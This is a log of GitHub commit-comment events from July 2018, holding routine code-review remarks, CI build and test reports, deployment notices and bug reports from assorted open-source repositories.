{"id":"7956388529","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29685654,"position":null,"line":null,"path":null,"commit_id":"4ebc05a3aa9ccb6ede1d23f05fda0bada1edb652","created_at":"2018-07-12T13:53:06Z","updated_at":"2018-07-12T13:53:06Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-135304 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-135304\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T13:53:06Z"}
{"id":"7956391017","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29685671,"position":null,"line":null,"path":null,"commit_id":"223680e12dd8fc692d4636ca50b8197816ed7b57","created_at":"2018-07-12T13:53:28Z","updated_at":"2018-07-12T13:53:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-42](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-42).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-42-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-12T13:53:28Z"}
{"id":"7956393484","type":"CommitCommentEvent","actor":{"login":"fwunsch"},"repo":{"name":"kit-cel/gnuradio"},"payload":{"comment":{"id":29685674,"position":22,"line":435,"path":"docs/doxygen/other/mimo.dox","commit_id":"f6ce4341c43a57d03b943e5b80f1eba3f74ada0a","created_at":"2018-07-12T13:53:50Z","updated_at":"2018-07-12T13:53:50Z","author_association":"MEMBER","body":"amlifying (typo)"}},"created_at":"2018-07-12T13:53:50Z"}
{"id":"7956396838","type":"CommitCommentEvent","actor":{"login":"DahmounLahcen"},"repo":{"name":"DahmounLahcen/demo_git"},"payload":{"comment":{"id":29685683,"position":null,"line":null,"path":null,"commit_id":"86908104fa2352bdedb168abf2c3a251a138172a","created_at":"2018-07-12T13:54:23Z","updated_at":"2018-07-12T13:54:23Z","author_association":"OWNER","body":"Ver0.01"}},"created_at":"2018-07-12T13:54:23Z"}
{"id":"7956398165","type":"CommitCommentEvent","actor":{"login":"Aux5"},"repo":{"name":"Aux5/Spoodify"},"payload":{"comment":{"id":29685686,"position":null,"line":null,"path":null,"commit_id":"7e1279b2e2372f7c9f05f11f832826765541572b","created_at":"2018-07-12T13:54:35Z","updated_at":"2018-07-12T13:54:35Z","author_association":"OWNER","body":"Thanks!\r\n\r\n\r\n________________________________\r\nFrom: Jordan Castelloe <notifications@github.com>\r\nSent: Wednesday, July 11, 2018 10:18 AM\r\nTo: Aux5/Spoodify\r\nCc: Brett Shearin; Author\r\nSubject: Re: [Aux5/Spoodify] Everything works except for the CheckBox (7e1279b)\r\n\r\n\r\nThis looks good, Brett! Good job! 👍\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/Aux5/Spoodify/commit/7e1279b2e2372f7c9f05f11f832826765541572b#commitcomment-29672781>, or mute the thread<https://github.com/notifications/unsubscribe-auth/Ahm6dFmYsXAfYG6o8lxijbRhewL-oGanks5uFhc8gaJpZM4VLWAK>.\r\n"}},"created_at":"2018-07-12T13:54:35Z"}
{"id":"7956398197","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29685687,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T13:54:36Z","updated_at":"2018-07-12T13:54:36Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-12T13:54:36Z"}
{"id":"7956400885","type":"CommitCommentEvent","actor":{"login":"fwunsch"},"repo":{"name":"kit-cel/gnuradio"},"payload":{"comment":{"id":29685693,"position":null,"line":null,"path":null,"commit_id":"f6ce4341c43a57d03b943e5b80f1eba3f74ada0a","created_at":"2018-07-12T13:55:02Z","updated_at":"2018-07-12T13:55:02Z","author_association":"MEMBER","body":"Two small typos. Fix them and we can merge this! :) :+1: "}},"created_at":"2018-07-12T13:55:02Z"}
{"id":"7956402096","type":"CommitCommentEvent","actor":{"login":"vystydp"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685698,"position":37,"line":35,"path":"src/app/containers/HomeContainer.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T13:55:15Z","updated_at":"2018-07-12T13:55:15Z","author_association":"NONE","body":"It's not important but am not sure why we prefer immutable Map instead of pure js Map? Do we need here immutability? this.props.tasks.get has complexity O(log32 N), pure js dictionary (this.props.tasks.error) has O(1)?\r\n\r\nhttps://facebook.github.io/immutable-js/docs/#/Map\r\n\r\nIt there some improvements on the reducers layer? However, I know the complexity is not important here, it's just a question maybe is there some improvements on reducers layer?\r\n\r\nI have heard that management of immutable structures are all much more slower then classic Object.assign"}},"created_at":"2018-07-12T13:55:15Z"}
{"id":"7956407036","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29685708,"position":null,"line":null,"path":null,"commit_id":"82e4f93434f67a118dee10e388f5f0cbd365000e","created_at":"2018-07-12T13:56:00Z","updated_at":"2018-07-12T13:56:00Z","author_association":"NONE","body":"fuel-cell-thermal-fixes (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-82e4f93434f67a118dee10e388f5f0cbd365000e-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-12T13:56:00Z"}
{"id":"7956407404","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29685709,"position":null,"line":null,"path":null,"commit_id":"54d9edfee5785714ba27f9be3f244538a5a70b9a","created_at":"2018-07-12T13:56:04Z","updated_at":"2018-07-12T13:56:04Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |Linux|Win|macOS|\n|---|---|---|---|\n|Blender py36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcblender-python-36-master-54d9edf-macos64.zip)|\n|IfcConvert| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcConvert-master-54d9edf-macos64.zip)|\n|IfcGeomServer| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/IfcGeomServer-master-54d9edf-macos64.zip)|\n|Python 27| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27-master-54d9edf-macos64.zip)|\n|Python 27u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-27u-master-54d9edf-macos64.zip)|\n|Python 32| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32-master-54d9edf-macos64.zip)|\n|Python 32u| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-linux64.zip)| | [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-32u-master-54d9edf-macos64.zip)|\n|Python 33| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-33-master-54d9edf-macos64.zip)|\n|Python 34| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-34-master-54d9edf-macos64.zip)|\n|Python 35| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-35-master-54d9edf-macos64.zip)|\n|Python 36| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-linux32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-linux64.zip)| [32bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-win32.zip) / [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-win64.zip)| [64bit](https://s3.amazonaws.com/ifcopenshell-builds/ifcopenshell-python-36-master-54d9edf-macos64.zip)|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-12T13:56:04Z"}
{"id":"7956407479","type":"CommitCommentEvent","actor":{"login":"IfcOpenBot"},"repo":{"name":"IfcOpenBot/IfcOpenShell"},"payload":{"comment":{"id":29685710,"position":null,"line":null,"path":null,"commit_id":"5aebfe9f22c36245afdb0918d251e9d086e9ee42","created_at":"2018-07-12T13:56:05Z","updated_at":"2018-07-12T13:56:05Z","author_association":"OWNER","body":"Hi,\n\nI've created the following builds for your commit:\n\n| |\n|---|\n\nKind regards,\nIfcOpenBot\n"}},"created_at":"2018-07-12T13:56:05Z"}
{"id":"7956409339","type":"CommitCommentEvent","actor":{"login":"mora145"},"repo":{"name":"Ludeon/RimWorld-Spanish"},"payload":{"comment":{"id":29685716,"position":null,"line":null,"path":null,"commit_id":"a81ef599dc5cac6a20e85fa8a4d0a4d0a449827c","created_at":"2018-07-12T13:56:22Z","updated_at":"2018-07-12T13:56:22Z","author_association":"CONTRIBUTOR","body":"Voy a ir subiendo lo que llevo. "}},"created_at":"2018-07-12T13:56:22Z"}
{"id":"7956413935","type":"CommitCommentEvent","actor":{"login":"Badarosk0"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29685725,"position":null,"line":null,"path":null,"commit_id":"f979710985d2e946bb00ce36a2ae8f60d0e7f4be","created_at":"2018-07-12T13:57:05Z","updated_at":"2018-07-12T13:57:05Z","author_association":"NONE","body":"@Atemo \r\nif (.@equip_refine < 7) {\r\n\r\nThis is preventing refining from occurring. Replace with:\r\nf (getequiprefinerycnt(.@part) < 7) {"}},"created_at":"2018-07-12T13:57:05Z"}
{"id":"7956414282","type":"CommitCommentEvent","actor":{"login":"kholia"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":29685726,"position":null,"line":null,"path":null,"commit_id":"8c46810e588e45b0753b8c4d2f254c321fb0c6af","created_at":"2018-07-12T13:57:09Z","updated_at":"2018-07-12T13:57:09Z","author_association":"COLLABORATOR","body":"Open a new issue with more details. Do not hijack existing \"threads\"."}},"created_at":"2018-07-12T13:57:09Z"}
{"id":"7956417621","type":"CommitCommentEvent","actor":{"login":"tkit1994"},"repo":{"name":"tkit1994/Person_reID_baseline_pytorch"},"payload":{"comment":{"id":29685733,"position":null,"line":null,"path":null,"commit_id":"9b7d13bab1e5db76f0dab195a01943a47fbd62b5","created_at":"2018-07-12T13:57:38Z","updated_at":"2018-07-12T13:57:38Z","author_association":"OWNER","body":"# Bug\r\nevaluate_rerank with the  the model trained on market1501 with PCB option will output the following content:\r\n\r\n```\r\n(mypy) ➜  Person_reID_baseline_pytorch git:(master) ✗ python evaluate_rerank.py\r\ncalculate initial distance\r\n/mnt/myshare/storage/build/Person_reID_baseline_pytorch/re_ranking.py:68: RuntimeWarning: overflow encountered in exp\r\n  weight = np.exp(-original_dist[i,k_reciprocal_expansion_index])\r\n/mnt/myshare/storage/build/Person_reID_baseline_pytorch/re_ranking.py:69: RuntimeWarning: invalid value encountered in true_divide\r\n  V[i,k_reciprocal_expansion_index] = 1.*weight/np.sum(weight)\r\nReranking complete in 1m 33s\r\ntop1:0.013361 top5:0.013658 top10:0.013658 mAP:0.010014\r\n```\r\n# Bugfix \r\n\r\nnormallize the feature extracted with the model trained with PCB properly. The L2 Norm of the extracted feature vector should be 1."}},"created_at":"2018-07-12T13:57:38Z"}
{"id":"7956424582","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29685745,"position":1,"line":1,"path":"src/main/external-resources/third-party/Build NSIS Linux and macOS.txt","commit_id":"13681e36d359c2ccca17915d7eb506a6ef5471c5","created_at":"2018-07-12T13:58:41Z","updated_at":"2018-07-12T13:58:41Z","author_association":"CONTRIBUTOR","body":"I don't think we need to define the Python and SCons versions. All that's needed is that they work, they are only used to run the build, and isn't in any way involved in the compilation itself."}},"created_at":"2018-07-12T13:58:41Z"}
{"id":"7956429777","type":"CommitCommentEvent","actor":{"login":"npostavs"},"repo":{"name":"nex3/dart-mode"},"payload":{"comment":{"id":29685751,"position":27,"line":1781,"path":"dart-mode.el","commit_id":"2759a1723f9fdf46723106e39d1cedb04ecda927","created_at":"2018-07-12T13:59:29Z","updated_at":"2018-07-12T13:59:29Z","author_association":"NONE","body":"`?\\(` should work instead of  `?\\x28` too."}},"created_at":"2018-07-12T13:59:29Z"}
{"id":"7956433409","type":"CommitCommentEvent","actor":{"login":"krytarowski"},"repo":{"name":"R3x/src"},"payload":{"comment":{"id":29685760,"position":null,"line":null,"path":null,"commit_id":"fec318eca80eaab46b6d2b503d5cf729e887521b","created_at":"2018-07-12T14:00:03Z","updated_at":"2018-07-12T14:00:03Z","author_association":"COLLABORATOR","body":"There is a question whether there is a string length limit in printf/panic buffer? If so, what is it?\r\n\r\nFor UBSan it wasn't an issue as strings were short.\r\n\r\nDepending on the answer we will act accordingly."}},"created_at":"2018-07-12T14:00:03Z"}
{"id":"7956436002","type":"CommitCommentEvent","actor":{"login":"yurisi0212"},"repo":{"name":"yurisi0212/test_omikuji"},"payload":{"comment":{"id":29685770,"position":null,"line":null,"path":null,"commit_id":"b75f9e7f2ed40b6ed7e5c13f20e9c43a55c6aece","created_at":"2018-07-12T14:00:26Z","updated_at":"2018-07-12T14:00:26Z","author_association":"OWNER","body":"今後の更新はないでしょう"}},"created_at":"2018-07-12T14:00:26Z"}
{"id":"7956444970","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29685786,"position":null,"line":null,"path":null,"commit_id":"c31e23de8d7f2f21bf99ec3a9b1e057501a0462f","created_at":"2018-07-12T14:01:47Z","updated_at":"2018-07-12T14:01:47Z","author_association":"NONE","body":"expanded-runperiod (jasondegraw) - Win64-Windows-7-VisualStudio-14: OK (2935 of 2935 tests passed, 13 test warnings)\n\nMessages:\n\n * 12 tests had: AUD diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: Table small diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-c31e23de8d7f2f21bf99ec3a9b1e057501a0462f-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-12T14:01:47Z"}
{"id":"7956445813","type":"CommitCommentEvent","actor":{"login":"soup-bowl"},"repo":{"name":"ReviveToday/Sparkling"},"payload":{"comment":{"id":29685793,"position":null,"line":null,"path":null,"commit_id":"4e7e38ccc0eb3f8d402ba8e6c77ca62568fe357a","created_at":"2018-07-12T14:01:55Z","updated_at":"2018-07-12T14:01:55Z","author_association":"MEMBER","body":"Misleading commit title - License was actually _renamed_, removing .md for GitHub purposes."}},"created_at":"2018-07-12T14:01:55Z"}
{"id":"7956447830","type":"CommitCommentEvent","actor":{"login":"ywarnier"},"repo":{"name":"chamilo/chamilo-lms"},"payload":{"comment":{"id":29685796,"position":null,"line":null,"path":null,"commit_id":"03f0e482ef4b7e0071b325809d75ec9ecc41c4cd","created_at":"2018-07-12T14:02:14Z","updated_at":"2018-07-12T14:02:14Z","author_association":"MEMBER","body":"That doesn't look like a good idea. Let's keep a watch on that (like this could change depending on the context, no?)"}},"created_at":"2018-07-12T14:02:14Z"}
{"id":"7956449253","type":"CommitCommentEvent","actor":{"login":"mauryaritesh11"},"repo":{"name":"codingforentrepreneurs/eCommerce"},"payload":{"comment":{"id":29685798,"position":null,"line":null,"path":null,"commit_id":"6aa47a5627c5f57b3fca3cb52738c96609cc3746","created_at":"2018-07-12T14:02:28Z","updated_at":"2018-07-12T14:02:28Z","author_association":"NONE","body":"I am creating e-commerce website and i got error in Django \r\nRequest Method: | GET\r\n-- | --\r\nhttp://127.0.0.1:8000/\r\n1.11.5\r\nTemplateDoesNotExist\r\nhome_page.html\r\nC:\\Users\\Ritesh Maurya\\dev\\ecommerce\\lib\\site-packages\\django\\template\\loader.py in get_template, line 25\r\nC:\\Users\\Ritesh Maurya\\dev\\ecommerce\\Scripts\\python.exe\r\n3.6.2\r\n\r\n"}},"created_at":"2018-07-12T14:02:28Z"}
{"id":"7956449460","type":"CommitCommentEvent","actor":{"login":"nichcream"},"repo":{"name":"nichcream/android_device_xiaomi_land"},"payload":{"comment":{"id":29685799,"position":null,"line":null,"path":null,"commit_id":"c51630d184fc468c07b0f8c66ccc86551f0794ac","created_at":"2018-07-12T14:02:30Z","updated_at":"2018-07-12T14:02:30Z","author_association":"OWNER","body":"> nice.. waiting for the new new build\r\nIt didn't fix the discoloration we had in whatsapp video calls."}},"created_at":"2018-07-12T14:02:30Z"}
{"id":"7956450168","type":"CommitCommentEvent","actor":{"login":"SundeepB"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685802,"position":8,"line":8,"path":"src/app/components/tasks/TasksComponent.js","commit_id":"9b01f165733616b8d8de15b1b0de30637014cee1","created_at":"2018-07-12T14:02:37Z","updated_at":"2018-07-12T14:02:37Z","author_association":"NONE","body":"Is `propTypes` a keyword that is automatically checked during compilation?"}},"created_at":"2018-07-12T14:02:37Z"}
{"id":"7956452783","type":"CommitCommentEvent","actor":{"login":"xzr467706992"},"repo":{"name":"characteress2/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":29685813,"position":null,"line":null,"path":null,"commit_id":"55d54f2827162cf89b66473dad918ba9b5b3aefa","created_at":"2018-07-12T14:03:04Z","updated_at":"2018-07-12T14:03:04Z","author_association":"NONE","body":"Lol someone really use this crazy OC:joy:"}},"created_at":"2018-07-12T14:03:04Z"}
{"id":"7956454499","type":"CommitCommentEvent","actor":{"login":"guishenbumie"},"repo":{"name":"guishenbumie/MySOA"},"payload":{"comment":{"id":29685816,"position":null,"line":null,"path":null,"commit_id":"ab1e61877fe6b40a914ed6babfd555c7fd6af5a4","created_at":"2018-07-12T14:03:20Z","updated_at":"2018-07-12T14:03:20Z","author_association":"OWNER","body":"提交"}},"created_at":"2018-07-12T14:03:20Z"}
{"id":"7956457679","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29685825,"position":1,"line":1,"path":"src/main/external-resources/third-party/Build NSIS Linux and macOS.txt","commit_id":"13681e36d359c2ccca17915d7eb506a6ef5471c5","created_at":"2018-07-12T14:03:50Z","updated_at":"2018-07-12T14:03:50Z","author_association":"CONTRIBUTOR","body":"Sure, they just have to read the NSIS official documentation:\r\nhttp://nsis.sourceforge.net/Docs/AppendixG.html"}},"created_at":"2018-07-12T14:03:50Z"}
{"id":"7956460195","type":"CommitCommentEvent","actor":{"login":"G0L0L"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685839,"position":37,"line":35,"path":"src/app/containers/HomeContainer.js","commit_id":"557bc3f31bec3e0df4d21084dea063e980c765d3","created_at":"2018-07-12T14:04:14Z","updated_at":"2018-07-12T14:04:14Z","author_association":"COLLABORATOR","body":"The point is to have everything immutable. If the code doesn't call `map.get` 100k times per second, the complexity won't be noticeable.\r\n\r\nthere are some benefits from immutable map here:\r\n1) you are 100% sure nobody will misuse it (mutate)\r\n2) you have all those fancy method on map instance like `map`, `sort,` `size` and so on\r\n3) you are able to compare maps using `===` operator"}},"created_at":"2018-07-12T14:04:14Z"}
{"id":"7956460773","type":"CommitCommentEvent","actor":{"login":"ginkomix"},"repo":{"name":"emkurilenko/testJS"},"payload":{"comment":{"id":29685840,"position":21,"line":21,"path":"js/arrayTool.js","commit_id":"aa5516f2502274adbae15cdc256e4a27b190bdbe","created_at":"2018-07-12T14:04:20Z","updated_at":"2018-07-12T14:04:20Z","author_association":"NONE","body":"Женя, что это?!??!?1771"}},"created_at":"2018-07-12T14:04:20Z"}
{"id":"7956463372","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29685846,"position":5,"line":5,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-12T14:04:44Z","updated_at":"2018-07-12T14:04:44Z","author_association":"NONE","body":"Do you know what is this function? It is a regular function that lets anyone become the `owner`. This is **not** a constructor."}},"created_at":"2018-07-12T14:04:44Z"}
{"id":"7956474634","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29685878,"position":33,"line":33,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-12T14:06:34Z","updated_at":"2018-07-12T14:06:34Z","author_association":"NONE","body":"You could move this one line above and then `require(amount > 0)`. Like that you only load from storage once, thereby saving gas."}},"created_at":"2018-07-12T14:06:34Z"}
{"id":"7956475418","type":"CommitCommentEvent","actor":{"login":"G0L0L"},"repo":{"name":"DemoLearn/TickerAppFrontend"},"payload":{"comment":{"id":29685879,"position":8,"line":8,"path":"src/app/components/tasks/TasksComponent.js","commit_id":"9b01f165733616b8d8de15b1b0de30637014cee1","created_at":"2018-07-12T14:06:42Z","updated_at":"2018-07-12T14:06:42Z","author_association":"COLLABORATOR","body":"In runtime, but with an condition.\r\nReact relays on env variable `mode`, this validation is being performed only if mode is `DEVELOPMENT`.\r\n\r\nAnd now question is how to set this `mode` variable :) It depends on you building system. For example, `Webpack` has this feature out of the box (take a look on the bottom of webpack config)."}},"created_at":"2018-07-12T14:06:42Z"}
{"id":"7956477377","type":"CommitCommentEvent","actor":{"login":"polynamaude"},"repo":{"name":"pH7Software/pH7-Social-Dating-CMS"},"payload":{"comment":{"id":29685882,"position":null,"line":null,"path":null,"commit_id":"4fe076f3678b1e8332404a9bc53ed86e96615504","created_at":"2018-07-12T14:07:00Z","updated_at":"2018-07-12T14:07:00Z","author_association":"NONE","body":"Why not suggest in the docs to use the -A flags as curl is used for web scrapping ?"}},"created_at":"2018-07-12T14:07:00Z"}
{"id":"7956479162","type":"CommitCommentEvent","actor":{"login":"sklar"},"repo":{"name":"datasapiens/ui-kit"},"payload":{"comment":{"id":29685884,"position":null,"line":null,"path":null,"commit_id":"01878e077a13c550083d9fab91870c37a8ea8938","created_at":"2018-07-12T14:07:18Z","updated_at":"2018-07-12T14:07:18Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Report: Image size (markdown)](https://trello.com/c/VfINyxEZ/2187-report-image-size-markdown)"}},"created_at":"2018-07-12T14:07:18Z"}
{"id":"7956484336","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29685890,"position":1,"line":1,"path":"src/main/external-resources/third-party/Build NSIS Linux and macOS.txt","commit_id":"13681e36d359c2ccca17915d7eb506a6ef5471c5","created_at":"2018-07-12T14:08:07Z","updated_at":"2018-07-12T14:08:07Z","author_association":"CONTRIBUTOR","body":"It's not really for \"them\", it's for \"us\" to remember how to do it when upgrading NSIS in the future. My point isn't that it doesn't matter, but that's it's not really relevant for this instruction. We could go on to define supported platforms, CPU types and whatnot, but it's not really needed to be able to make a new build. I also assume that this requirement might change over time."}},"created_at":"2018-07-12T14:08:07Z"}
